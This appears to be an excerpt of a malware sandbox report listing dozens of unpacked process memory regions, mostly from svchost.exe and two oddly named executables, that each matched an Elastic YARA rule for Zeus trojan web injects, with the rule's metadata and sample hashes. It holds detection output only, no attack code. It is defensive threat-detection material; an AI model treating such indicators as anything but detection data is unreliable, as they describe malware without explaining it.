Source: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bonelessness.exe.86d460.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.2601000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 23.2.JbrLYfXaOpqnSngA.exe.b92000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.JbrLYfXaOpqnSngA.exe.852000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.2606c00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.2570000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.JbrLYfXaOpqnSngA.exe.852000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.31.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.38.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bonelessness.exe.868460.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.2d83c00.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.24c2000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.JbrLYfXaOpqnSngA.exe.a00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.2d83c00.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3a80000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bonelessness.exe.86d460.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.37.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bonelessness.exe.407000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.24.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
